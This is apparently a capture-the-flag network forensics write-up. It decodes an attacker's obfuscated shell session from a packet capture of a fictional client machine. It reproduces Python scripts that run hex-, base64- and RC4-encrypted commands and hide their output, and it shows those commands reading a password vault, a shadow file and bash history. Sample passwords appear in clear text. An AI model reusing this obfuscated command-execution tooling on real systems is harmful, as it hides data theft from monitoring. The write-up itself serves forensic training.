“What is one of the network's clients up to? Understand the traffic and answer the questions.
(16821 bytes, sha256: e260730a555a30b8bd312c6f00be816353b22f72fdbfd0bdf19403727ae20212)”
Questions and answers
- Which commands are run in the first step?
ls -la
netstat
- Which commands are run in the second step?
ls -la
ls -la backup/
cat backup/pw_vault
cat backup/shadow_copy
ls private
ls work
- What is user2's password?
HorseHatBatteryStaple
- When does the attack take place?
At dawn.
- Which weapons will they use?
Swords and/or an intercontinental ballistic missile.
Summary of the incident
Using obfuscated commands, sensitive information was exfiltrated from the
computer. Above all, the perpetrators obtained the login credentials (username and
password) of one of the computer's users with administrative privileges, as well as a
copy of the password-protected file ~/work/secret_plans.zip. The file's password,
which was saved in the shell history, was exfiltrated too.
Detailed technical description
The network traffic contains a TCP stream (obtained, for example, with
tshark -q -r trafik.pcap -z follow,tcp,ascii,0):
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd1')"
746f74616c2038340a64727778722d78722d7820313020757365723120757365723120343...
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd2')"
41637469766520496e7465726e657420636f6e6e656374696f6e732028772f6f207365727...
<3vil$hell:#> python3 -c "import f1 as f; r=f.A.d('696d706f7274207379730a...
...72696e742872290a202020207072696e7428422e65287229290a');print(r)" > f2.py
<3vil$hell:#> python3 -c "import f2 as f;e=f.B.e('d');print(e)"
ZA==
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJy1sYSdd')"
dG90YWwgODgKZHJ3eHIteHIteCAxMCB1c2VyMSB1c2VyMSA0MDk2IE1hciAyNSAwODowOCAuC...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJy1sYScsJ2JhY2t1c...
dG90YWwgMTYKZHJ3eHJ3eC0tLSAgMiB1c2VyMSB1c2VyMSA0MDk2IEZlYiAgMyAwODoxMCAuC...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydjYXQnLCdiYWNrdXAvcHdfd...
QWNjb3VudHM6CiAgVXNlcgkJUGFzcwogIC0tLS0tLS0tLS0tLS0tCiAgcm9vdCAgICAgIAogI...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydjYXQnLCdiYWNrdXAvc2hhZ...
cm9vdDo0YzUyMzQ3M2IxOTM3MzZkN2UwMGVjNmE5YmUxNDgwYTZiMTBhY2U1MTg0Nzg0YjNmY...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJ3ByaXZhdGUnXQ==')"
YmFua19kZXRhaWxzCnBob3Rvcwo=
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJ3dvcmsnXQ==')"
bWFpbHMKbWVldGluZyBwcm90b2NvbHMKcHJvc3BlY3RzCnNjcmlwdHMKc2VjcmV0X3BsYW5zL...
<3vil$hell:#> python3 -c "import f2 as f; r=f.B.d('aW1wb3J0IHN1YnByb2Nlc3...
...ICAgZXhlY3V0ZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgoK');print(r)" > f3.py
<3vil$hell:#> python3 f3.py 1b17574cd639192cd70e file.txt
<3vil$hell:#> python3 f3.py 335f575790670c7a8c5218e71c0e7f98dc6a1b3a6f9bc...
1b0c5e4ec23f113cef340ebd0c1379cdca6d61
<3vil$hell:#> python3 f3.py a5ad93b50fa02e50fef36c82
8dfe9ba95df8335d98e624ab6c98914e8a2c480264c04ff1309287accd417ffbb59b892ad...
<3vil$hell:#> python3 f3.py a5ad93b50fa02e0afde020f02aa9
8dfe9ba95df8335d98ff2ab66187bb1ad94358197ddf1dac3a8fdebb8e1f23a8ca989e379...
<3vil$hell:#> python3 f3.py a5ad8aa852e5795abeb53cb07f9f9e04d9455e1567e74...
File is password-protected.
<3vil$hell:#> python3 f3.py a5ad9ca75cab255af0f338b7529cd804c8495e0934e5
8dfe9ba95df8335d98e13ebb62d4d007c8065f1572ca5eb46897c3a6880327bab283e62b9...
<3vil$hell:#> python3 f3.py a5ad97a20fa02e50e4b567f87a9bc31c9355491361dd4...
8dfe9ba95df8335d98a27bef3dc481478c060c45239809be68d099f4dd446feba1c8dc68c...
<3vil$hell:#>
The communication can be split into three consecutive parts, each obfuscated in a different way. They are numbered below.
(1) f1.py
The first part
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd1')"
746f74616c2038340a64727778722d78722d7820313020757365723120757365723120343...
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd2')"
41637469766520496e7465726e657420636f6e6e656374696f6e732028772f6f207365727...
<3vil$hell:#> python3 -c "import f1 as f; r=f.A.d('696d706f7274207379730a...
...72696e742872290a202020207072696e7428422e65287229290a');print(r)" > f2.py
uses f1.py:
#!/usr/bin/python3
import sys
import subprocess as s
import commands as cm   # local ~/commands.py: dictionary c maps 'cmd1', 'cmd2', ... to commands

class A(object):
    def __init__(self, k):
        # run the command that cm.c maps k to and capture its stdout
        # self.r = sub.run(cm.c[str(k)])
        self.r = s.run(cm.c[str(k)], stdout=s.PIPE).stdout.decode()
        print(str(self))
    def __str__(self):
        # return A.e(self.r.stdout.decode())
        return A.e(self.r)
    @staticmethod
    def h(x):
        # one character as two hex digits
        return "%0.2x" % ord(x)
        # return repr(chr(ord(x)))
    @staticmethod
    def e(x):
        # hex-encode a whole string
        o = ''.join([str(A.h(c)) for c in x])
        return o
    @staticmethod
    def d(x):
        # decode a hex string back into text
        o = ''
        i = 0
        while i < len(x):
            o += str(chr(int(x[i:i+2], 16)))
            i += 2
        return o
First, two commands are run and their output is hex-encoded. Decoded, their respective outputs are
total 84
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:08 .
drwxr-xr-x 17 user1 user1 4096 Mar 25 08:06 ..
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 backup
-rw-rw-r-- 1 user1 user1 1096 Mar 25 07:37 bash_history
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 .bashrc
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 commands.py
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Documents
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Downloads
-rwxrwx--- 1 user1 user1 596 Feb 1 10:12 f1.py
-rwxrwx--- 1 user1 user1 6430 Feb 2 02:24 nc
-rwxrwx--- 1 user1 user1 9847 Mar 25 07:23 nc2
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Pictures
drwxrwx--- 3 user1 user1 4096 Feb 1 06:39 private
drwxr-xr-x 2 user1 user1 4096 Mar 25 08:08 __pycache__
-rw-rw-r-- 1 user1 user1 5503 Mar 25 08:05 README
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Videos
drwxrwx--- 6 user1 user1 4096 Mar 25 07:39 work
and
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost:8307 localhost:59580 ESTABLISHED
tcp 0 0 user:43215 worker:ssh ESTABLISHED
tcp 0 0 localhost:55412 localhost:https ESTABLISHED
tcp 509 0 user1:40145 webproxy.myweb:http-alt CLOSE_WAIT
tcp 0 0 localhost:https localhost:54789 ESTABLISHED
tcp 0 0 localhost:44223 localhost:1111 ESTABLISHED
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 33489 /run/user/1000/systemd/notify
unix 2 [ ] DGRAM 23543 /run/user/120/systemd/notify
unix 3 [ ] DGRAM 15950 /run/systemd/notify
unix 9 [ ] DGRAM 15961 /run/systemd/journal/socket
unix 2 [ ] DGRAM 15983 /run/systemd/journal/syslog
unix 29 [ ] DGRAM 16002 /run/systemd/journal/dev-log
unix 3 [ ] STREAM CONNECTED 50044
unix 2 [ ] STREAM CONNECTED 46503
unix 3 [ ] STREAM CONNECTED 40504
unix 3 [ ] STREAM CONNECTED 36404
unix 3 [ ] STREAM CONNECTED 41170 /run/systemd/journal/stdout
This output matches the commands ls -la and netstat respectively, but
exactly what 'cmd1' and 'cmd2' are is determined by the dictionary c in ~/commands.py.
Finally, f2.py is created by decoding a hex string.
(2) f2.py
The second part
<3vil$hell:#> python3 -c "import f2 as f;e=f.B.e('d');print(e)"
ZA==
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJy1sYSdd')"
dG90YWwgODgKZHJ3eHIteHIteCAxMCB1c2VyMSB1c2VyMSA0MDk2IE1hciAyNSAwODowOCAuC...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJy1sYScsJ2JhY2t1c...
dG90YWwgMTYKZHJ3eHJ3eC0tLSAgMiB1c2VyMSB1c2VyMSA0MDk2IEZlYiAgMyAwODoxMCAuC...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydjYXQnLCdiYWNrdXAvcHdfd...
QWNjb3VudHM6CiAgVXNlcgkJUGFzcwogIC0tLS0tLS0tLS0tLS0tCiAgcm9vdCAgICAgIAogI...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydjYXQnLCdiYWNrdXAvc2hhZ...
cm9vdDo0YzUyMzQ3M2IxOTM3MzZkN2UwMGVjNmE5YmUxNDgwYTZiMTBhY2U1MTg0Nzg0YjNmY...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJ3ByaXZhdGUnXQ==')"
YmFua19kZXRhaWxzCnBob3Rvcwo=
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJ3dvcmsnXQ==')"
bWFpbHMKbWVldGluZyBwcm90b2NvbHMKcHJvc3BlY3RzCnNjcmlwdHMKc2VjcmV0X3BsYW5zL...
<3vil$hell:#> python3 -c "import f2 as f; r=f.B.d('aW1wb3J0IHN1YnByb2Nlc3...
...ICAgZXhlY3V0ZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgoK');print(r)" > f3.py
uses f2.py:
import sys
import subprocess as s
import commands as cm   # local ~/commands.py: c['func1'] / c['func2'] do the encoding and decoding

class B(object):
    @staticmethod
    def e(x):
        # encode a string (base64, judging by the traffic)
        o = cm.c['func1'](x.encode())
        return o.decode()
    @staticmethod
    def d(x):
        # decode a string
        o = cm.c['func2'](x.encode())
        return o.decode()

def run(cmd):
    # decode the argument, eval it into an argv list, run it, encode the output
    dec = eval(B.d(cmd))
    r = s.run(dec, stdout=s.PIPE).stdout.decode()
    # print(r)
    print(B.e(r))
Exactly how the communication is obfuscated depends on 'func1' and 'func2', which
are determined by the dictionary c in ~/commands.py, but by all appearances
base64-encoded commands are run and their output is base64-encoded as well. The decoded
commands and output follow below.
['ls','-la']
total 88
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:08 .
drwxr-xr-x 17 user1 user1 4096 Mar 25 08:06 ..
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 backup
-rw-rw-r-- 1 user1 user1 1096 Mar 25 07:37 bash_history
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 .bashrc
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 commands.py
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Documents
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Downloads
-rwxrwx--- 1 user1 user1 596 Feb 1 10:12 f1.py
-rw-r--r-- 1 user1 user1 391 Mar 25 08:08 f2.py
-rwxrwx--- 1 user1 user1 6430 Feb 2 02:24 nc
-rwxrwx--- 1 user1 user1 9847 Mar 25 07:23 nc2
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Pictures
drwxrwx--- 3 user1 user1 4096 Feb 1 06:39 private
drwxr-xr-x 2 user1 user1 4096 Mar 25 08:08 __pycache__
-rw-rw-r-- 1 user1 user1 5503 Mar 25 08:05 README
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Videos
drwxrwx--- 6 user1 user1 4096 Mar 25 07:39 work
['ls','-la','backup/']
total 16
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 .
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:08 ..
-rwxrwx--- 1 user1 user1 0 Feb 1 03:08 .bashhist
-rwxrwx--- 1 user1 user1 126 Feb 3 08:10 pw_vault
-rwxrwx--- 1 user1 user1 352 Feb 2 01:38 shadow_copy
['cat','backup/pw_vault']
Accounts:
User Pass
--------------
root
user1 sommar2019
user2 HorseHatBatteryStaple
user3
['cat','backup/shadow_copy']
root:4c523473b193736d7e00ec6a9be1480a6b10ace5184784b3fabb331fcae40357 // notes: root-priviledges pw: --
user1:d146c62ff4a1b1552bfe162b86d7a656a26d2ad1cf812c4fb3eea0c272bc313b // notes: non_root-priv pw: sommar2020
user2:6008534dbeb34eb413a308f06067bb7f7060582e0b5b3d85c3e35bd07948c437 // notes: root_priviledges pw: HorseHatBatteryStaple
user3:
['ls','private']
bank_details
photos
['ls','work']
mails
meeting protocols
prospects
scripts
secret_plans.zip
Finally, f3.py is created by decoding a base64-encoded string.
(3) f3.py
The last part
<3vil$hell:#> python3 f3.py 1b17574cd639192cd70e file.txt
<3vil$hell:#> python3 f3.py 335f575790670c7a8c5218e71c0e7f98dc6a1b3a6f9bc...
1b0c5e4ec23f113cef340ebd0c1379cdca6d61
<3vil$hell:#> python3 f3.py a5ad93b50fa02e50fef36c82
8dfe9ba95df8335d98e624ab6c98914e8a2c480264c04ff1309287accd417ffbb59b892ad...
<3vil$hell:#> python3 f3.py a5ad93b50fa02e0afde020f02aa9
8dfe9ba95df8335d98ff2ab66187bb1ad94358197ddf1dac3a8fdebb8e1f23a8ca989e379...
<3vil$hell:#> python3 f3.py a5ad8aa852e5795abeb53cb07f9f9e04d9455e1567e74...
File is password-protected.
<3vil$hell:#> python3 f3.py a5ad9ca75cab255af0f338b7529cd804c8495e0934e5
8dfe9ba95df8335d98e13ebb62d4d007c8065f1572ca5eb46897c3a6880327bab283e62b9...
<3vil$hell:#> python3 f3.py a5ad97a20fa02e50e4b567f87a9bc31c9355491361dd4...
8dfe9ba95df8335d98a27bef3dc481478c060c45239809be68d099f4dd446feba1c8dc68c...
uses f3.py:
import subprocess as sub

def ed(data, key):
    # encryptor / decryptor (RC4: key scheduling, then keystream XOR)
    # return value is binary
    x = 0
    box = list(range(256))
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x, y = 0, 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)

def h(x):
    # hex one character
    return "%0.2x" % ord(x)

def c(s):
    # encode a string s, calls h(x) on each character
    return ''.join([str(h(c)) for c in s])

def g(x):
    # un-hex a hex-string into a ascii-string
    o = ''
    i = 0
    while i < len(x):
        o += str(chr(int(x[i:i+2], 16)))
        i += 2
    return o

def execute(cmd, f=None):
    # the key is read from pass.txt on every call; fallback is hard-coded
    try:
        with open('pass.txt', 'r') as _f:
            pw = _f.read().strip()
    except Exception as e:
        # print(e)
        pw = 'default_pass'
    # print(pw)
    cmd = g(cmd)
    cmd = ed(cmd, pw)
    # print(cmd)
    if f is not None: # f is set, write the decrypted data to that file
        with open(f, 'w') as _f:
            _f.write(cmd)
            _f.write('\n')
    else:
        # otherwise eval the decrypted text into an argv list and run it
        cmd = eval(cmd)
        m = sub.run(cmd, stdout=sub.PIPE, stderr=sub.PIPE)
        # print('out', m.stdout.decode())
        # print('err', m.stderr.decode())
        mout = 'stdout: \n' + m.stdout.decode() + '\n'
        mout += 'stderr: \n' + m.stderr.decode()
        # print(mout)
        mout = c(ed(mout, pw))
        print(mout)

if __name__ == '__main__':
    import sys
    if len(sys.argv) == 2:
        execute(sys.argv[1])
    if len(sys.argv) == 3:
        execute(sys.argv[1], sys.argv[2])
Input and output are encrypted (with ed(data, key)) and hex-encoded. Decryption uses
the same function and key as encryption. The key to use is specified in the
file pass.txt; if the file is missing, a hard-coded default key
('default_pass') is used. With two arguments to f3.py, argument 1 is decoded and
decrypted and written to the file given by argument 2. With only one argument,
it is decoded and decrypted and then run as a command.
To interpret the traffic, one therefore has to decode the hex strings and decrypt with
the right key. The traffic follows below, but with the data in clear text.
The decryption key is initially 'default_pass', since the file pass.txt
does not exist yet.
<3vil$hell:#> python3 f3.py sommar2020 file.txt
<3vil$hell:#> python3 f3.py ['mv','file.txt','pass.txt']
stdout:
stderr:
The file pass.txt now exists with the content sommar2020. The remaining data
is therefore decrypted with the key sommar2020.
<3vil$hell:#> python3 f3.py ['ls','-la']
stdout:
total 96
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:09 .
drwxr-xr-x 17 user1 user1 4096 Mar 25 08:06 ..
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 backup
-rw-rw-r-- 1 user1 user1 1096 Mar 25 07:37 bash_history
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 .bashrc
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 commands.py
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Documents
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Downloads
-rwxrwx--- 1 user1 user1 596 Feb 1 10:12 f1.py
-rw-r--r-- 1 user1 user1 391 Mar 25 08:08 f2.py
-rw-r--r-- 1 user1 user1 1747 Mar 25 08:09 f3.py
-rwxrwx--- 1 user1 user1 6430 Feb 2 02:24 nc
-rwxrwx--- 1 user1 user1 9847 Mar 25 07:23 nc2
-rw-r--r-- 1 user1 user1 11 Mar 25 08:09 pass.txt
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Pictures
drwxrwx--- 3 user1 user1 4096 Feb 1 06:39 private
drwxr-xr-x 2 user1 user1 4096 Mar 25 08:08 __pycache__
-rw-rw-r-- 1 user1 user1 5503 Mar 25 08:05 README
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Videos
drwxrwx--- 6 user1 user1 4096 Mar 25 07:39 work
stderr:
<3vil$hell:#> python3 f3.py ['ls','work/']
stdout:
mails
meeting protocols
prospects
scripts
secret_plans.zip
stderr:
<3vil$hell:#> python3 f3.py ['unzip','work/secret_plans.zip']
File is password-protected.
<3vil$hell:#> python3 f3.py ['cat','bash_history']
stdout:
sudo apt search wireshark
sudo apt install wireshark
python
sudo apt install python
sudo apt install python3.6
sudo apt install ipython3
which python
python
python3
history
man history
ld
ls
ping 8.8.8.8
sudo wireshark
ipython
ipython3
python3
ipython3
netstat
ifconfig
ls -la backup/
cat backup/pw_vault
ls -la backup/
cat backup/pw_vault
ls -la backup/
python
python3
ipython3
ls backup/
ls
ls
ls -la
cd work
ls
cd ..
ls
ls -la
cd work
ls
cd scripts
cd ..
cd plans
ls
cat attack_plans_VERY_SECRET.txt
cat drawing_of_our_new_wepon_VERY_SECRET.txt
nano drawing_of_our_new_wepon_VERY_SECRET.txt
cat drawing_of_our_new_wepon_VERY_SECRET.txt
nano drawing_of_our_new_wepon_VERY_SECRET.txt
nano attack_plans_VERY_SECRET.txt
nano drawing_of_our_new_wepon_VERY_SECRET.txt
cat drawing_of_our_new_wepon_VERY_SECRET.txt
cd ..
man zip
zip -r -P supersecretpassword secret_plans.zip plans
rm -rf plans
cd ..
private
cd private/
ls
cd ..
ls
ipython3
history
ls
ls
cd ..
cd ..
cd ..
ls
man unzip
history
cat .bash_history
ipython
ipython3
ls
mv plans plans2
ipython3
ipython
ipython3
ipython3
netstat
stderr:
<3vil$hell:#> python3 f3.py ['hd','-v','work/secret_plans.zip']
stdout:
00000000 50 4b 03 04 0a 00 00 00 00 00 84 7b 79 50 00 00 |PK.........{yP..|
00000010 00 00 00 00 00 00 00 00 00 00 06 00 1c 00 70 6c |..............pl|
00000020 61 6e 73 2f 55 54 09 00 03 78 6a 7b 5e 8a 6a 7b |ans/UT...xj{^.j{|
00000030 5e 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 |^ux.............|
00000040 50 4b 03 04 14 00 09 00 08 00 80 7b 79 50 a0 2d |PK.........{yP.-|
00000050 9f 8d 22 01 00 00 87 04 00 00 22 00 1c 00 70 6c |.."......."...pl|
00000060 61 6e 73 2f 61 74 74 61 63 6b 5f 70 6c 61 6e 73 |ans/attack_plans|
00000070 5f 56 45 52 59 5f 53 45 43 52 45 54 2e 74 78 74 |_VERY_SECRET.txt|
00000080 55 54 09 00 03 6f 6a 7b 5e f3 6a 7b 5e 75 78 0b |UT...oj{^.j{^ux.|
00000090 00 01 04 e8 03 00 00 04 e8 03 00 00 bb 56 7f 4a |.............V.J|
000000a0 94 9c 6f e5 a3 14 44 8b 19 5a 8d e0 ed b3 14 29 |..o...D..Z.....)|
000000b0 19 0a 45 94 01 0a b5 da 98 48 99 15 79 d1 25 36 |..E......H..y.%6|
000000c0 e8 e6 70 fb 9c f1 fd 78 ba db 5a 2e ad 27 b4 db |..p....x..Z..'..|
000000d0 9f 89 09 62 e0 00 32 92 90 a7 69 32 48 ed ae 3d |...b..2...i2H..=|
000000e0 d0 5f c4 42 46 c0 bb 9d 70 95 13 a2 73 df 98 5c |._.BF...p...s..\|
000000f0 7e ac b4 b7 45 a9 e2 9d 6c 7d 05 49 0b 3f d1 91 |~...E...l}.I.?..|
00000100 b7 30 e7 5e 06 32 dc c2 90 05 cd ad b3 55 34 1f |.0.^.2.......U4.|
00000110 8b 10 87 38 fc 99 16 07 50 53 d5 d1 75 b4 fd f8 |...8....PS..u...|
00000120 54 5f 9b e6 cd 98 33 50 fc 68 bb f9 2a d2 16 76 |T_....3P.h..*..v|
00000130 4b fe d1 37 d7 ac e1 0b 64 10 01 45 a7 96 d8 2e |K..7....d..E....|
00000140 8c 79 a8 0e 58 c4 ed ac 7f 55 7f e2 1b ef 1d 68 |.y..X....U.....h|
00000150 95 6f 67 9b ba 55 56 1e 8b 5f 1a 2c 18 c2 a3 a7 |.og..UV.._.,....|
00000160 10 43 a8 aa 65 86 aa d9 ed c9 5d fd ec d3 d7 62 |.C..e.....]....b|
00000170 ae b6 f7 0d 98 c4 fc 22 af 11 a4 3e e2 92 f2 eb |......."...>....|
00000180 ed 59 88 3f 86 62 65 12 b9 69 5c ad 35 2e f6 b3 |.Y.?.be..i\.5...|
00000190 b3 65 ed 4f 81 22 9b 39 88 39 46 8a 2b ad 71 93 |.e.O.".9.9F.+.q.|
000001a0 92 46 9e 20 96 15 fc dd c3 65 89 2e 37 a6 c6 d4 |.F. .....e..7...|
000001b0 e0 9a d1 8a 91 ca b2 87 a4 5c 91 4a 3a 5c 50 4b |.........\.J:\PK|
000001c0 07 08 a0 2d 9f 8d 22 01 00 00 87 04 00 00 50 4b |...-..".......PK|
000001d0 03 04 14 00 09 00 08 00 84 7b 79 50 e0 dd b7 d4 |.........{yP....|
000001e0 eb 00 00 00 ce 02 00 00 2f 00 1c 00 70 6c 61 6e |......../...plan|
000001f0 73 2f 64 72 61 77 69 6e 67 5f 6f 66 5f 6f 75 72 |s/drawing_of_our|
00000200 5f 6e 65 77 5f 77 65 61 70 6f 6e 5f 56 45 52 59 |_new_weapon_VERY|
00000210 5f 53 45 43 52 45 54 2e 74 78 74 55 54 09 00 03 |_SECRET.txtUT...|
00000220 78 6a 7b 5e f3 6a 7b 5e 75 78 0b 00 01 04 e8 03 |xj{^.j{^ux......|
00000230 00 00 04 e8 03 00 00 8c 34 0f 86 17 1a 87 29 f5 |........4.....).|
00000240 ae 0e 36 7f 9e d1 20 46 ae 75 00 fc 4a 53 de 84 |..6... F.u..JS..|
00000250 42 45 00 d7 59 75 17 1a ae 29 72 c6 90 19 bb db |BE..Yu...)r.....|
00000260 8a 9f f9 c8 f7 b5 37 a6 7d bd 3d fb ec 7d 61 b6 |......7.}.=..}a.|
00000270 5c 48 2e 25 05 56 bd ac 1e 4c bb 36 2c 60 68 96 |\H.%.V...L.6,`h.|
00000280 9f 3a 21 2c e5 2f 49 0b 92 9d c1 b8 df 66 3d 89 |.:!,./I......f=.|
00000290 5a ae 51 fb 3b db 31 85 15 17 2c ea a4 bd 43 e7 |Z.Q.;.1...,...C.|
000002a0 b4 34 02 6a cc 6b d5 bb 14 55 a2 d0 01 c8 07 97 |.4.j.k...U......|
000002b0 13 d4 2f 2e d0 20 43 04 99 45 11 eb 9a 15 7c 1f |../.. C..E....|.|
000002c0 b7 68 c0 7d ae 26 8c 63 5e a0 92 9d 2a 8a 7a 75 |.h.}.&.c^...*.zu|
000002d0 5b 31 d2 41 a7 08 b8 a5 fe 6b 6f 66 b7 75 1d bd |[1.A.....kof.u..|
000002e0 1f 49 37 3d 51 0e 7e e5 9e 40 96 e9 40 62 20 f2 |.I7=Q.~..@..@b .|
000002f0 6a 47 9e cc 9a e3 72 10 83 10 78 b1 cd ad 7c 2c |jG....r...x...|,|
00000300 8d 06 42 dc ed 7a 08 af ce 2b a6 83 47 07 2d 57 |..B..z...+..G.-W|
00000310 dc 8a 69 81 d8 cb 8f 18 30 75 3a 67 af 86 b1 45 |..i.....0u:g...E|
00000320 fe 17 50 4b 07 08 e0 dd b7 d4 eb 00 00 00 ce 02 |..PK............|
00000330 00 00 50 4b 01 02 1e 03 0a 00 00 00 00 00 84 7b |..PK...........{|
00000340 79 50 00 00 00 00 00 00 00 00 00 00 00 00 06 00 |yP..............|
00000350 18 00 00 00 00 00 00 00 10 00 ed 41 00 00 00 00 |...........A....|
00000360 70 6c 61 6e 73 2f 55 54 05 00 03 78 6a 7b 5e 75 |plans/UT...xj{^u|
00000370 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 50 4b |x.............PK|
00000380 01 02 1e 03 14 00 09 00 08 00 80 7b 79 50 a0 2d |...........{yP.-|
00000390 9f 8d 22 01 00 00 87 04 00 00 22 00 18 00 00 00 |..".......".....|
000003a0 00 00 01 00 00 00 b4 81 40 00 00 00 70 6c 61 6e |........@...plan|
000003b0 73 2f 61 74 74 61 63 6b 5f 70 6c 61 6e 73 5f 56 |s/attack_plans_V|
000003c0 45 52 59 5f 53 45 43 52 45 54 2e 74 78 74 55 54 |ERY_SECRET.txtUT|
000003d0 05 00 03 6f 6a 7b 5e 75 78 0b 00 01 04 e8 03 00 |...oj{^ux.......|
000003e0 00 04 e8 03 00 00 50 4b 01 02 1e 03 14 00 09 00 |......PK........|
000003f0 08 00 84 7b 79 50 e0 dd b7 d4 eb 00 00 00 ce 02 |...{yP..........|
00000400 00 00 2f 00 18 00 00 00 00 00 01 00 00 00 b4 81 |../.............|
00000410 ce 01 00 00 70 6c 61 6e 73 2f 64 72 61 77 69 6e |....plans/drawin|
00000420 67 5f 6f 66 5f 6f 75 72 5f 6e 65 77 5f 77 65 61 |g_of_our_new_wea|
00000430 70 6f 6e 5f 56 45 52 59 5f 53 45 43 52 45 54 2e |pon_VERY_SECRET.|
00000440 74 78 74 55 54 05 00 03 78 6a 7b 5e 75 78 0b 00 |txtUT...xj{^ux..|
00000450 01 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 |...........PK...|
00000460 00 00 00 03 00 03 00 29 01 00 00 32 03 00 00 00 |.......)...2....|
00000470 00 |.|
00000471
stderr:
<3vil$hell:#>
Note that the bash history reveals the password chosen when secret_plans.zip
was created. The file itself can be recovered from the hex dump (the output of the last
command) with the help of a script.
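One way to do that recovery, as an added example and not a script from the original write-up: parse the hd lines back into bytes, checking offset continuity and the ZIP local-header magic before writing the result. SAMPLE_HD holds the first two lines of the dump above plus a constructed end-offset line, so it yields only the start of the archive.

```python
"""Rebuild a binary file from hexdump/hd output.

parse_hd() reads the canonical layout (offset, up to 16 hex bytes, optional
|ascii| column, bare final offset) and fills in '*' squeeze lines, which
plain 'hd' emits for repeated rows and 'hd -v' suppresses.
"""
import re
import struct

HD_LINE = re.compile(r"^([0-9a-f]{8})((?:\s+[0-9a-f]{2}){0,16})\s*(\|.*\|)?$")

# First two lines of the write-up's dump plus a constructed end offset.
SAMPLE_HD = """\
00000000  50 4b 03 04 0a 00 00 00  00 00 84 7b 79 50 00 00  |PK.........{yP..|
00000010  00 00 00 00 00 00 00 00  00 00 06 00 1c 00 70 6c  |..............pl|
00000020
"""

def parse_hd(text: str) -> bytes:
    """Return the bytes described by hexdump-style output; raise on gaps."""
    data = bytearray()
    prev_row = b""
    squeezed = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "*":            # previous row repeats until the next offset
            if not prev_row:
                raise ValueError("'*' before any data row")
            squeezed = True
            continue
        m = HD_LINE.match(line)
        if not m:
            raise ValueError("unrecognised hexdump line: %r" % raw)
        offset = int(m.group(1), 16)
        if squeezed:
            while len(data) < offset:
                data += prev_row
            squeezed = False
        if offset != len(data):
            raise ValueError("offset 0x%x does not follow 0x%x bytes" % (offset, len(data)))
        row = bytes.fromhex("".join(m.group(2).split()))
        data += row
        prev_row = row
    return bytes(data)

def zip_local_header(data: bytes):
    """Parse the first ZIP local file header; returns (flags, method, name_len),
    or None when the 'PK\\x03\\x04' magic is absent."""
    if data[:4] != b"PK\x03\x04":
        return None
    _version, flags, method = struct.unpack_from("<HHH", data, 4)
    name_len, = struct.unpack_from("<H", data, 26)
    return flags, method, name_len

if __name__ == "__main__":
    blob = parse_hd(SAMPLE_HD)
    print(len(blob), "bytes, local header:", zip_local_header(blob))
    with open("recovered.bin", "wb") as fh:   # with the full dump: secret_plans.zip
        fh.write(blob)
```

Given the complete hd -v output between the stdout: and stderr: lines, the result is secret_plans.zip itself.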
secret_plans.zip contains two files:
plans/attack_plans_VERY_SECRET.txt
VERY VERY SUPERDUPER SECRET DOCUMENT
====================================
WARNING
DO NOT DISTRIBUTE TO ANYONE!!!
ABSOLUTELY NOT TO THE ENEMY!!!
===================================
When?
Timing is essential. Therefore we start the attack AT DAWN to take the enemy by surprise!
Attack plan:
\
======\
OUR FORCES ======= ENEMY FORCES
======/
/
===||
===|| |==
( > ' ' )> ( > ' ' )> ( > ' ' )>|| |<("<) <("<) <("<) <("<) <("<)
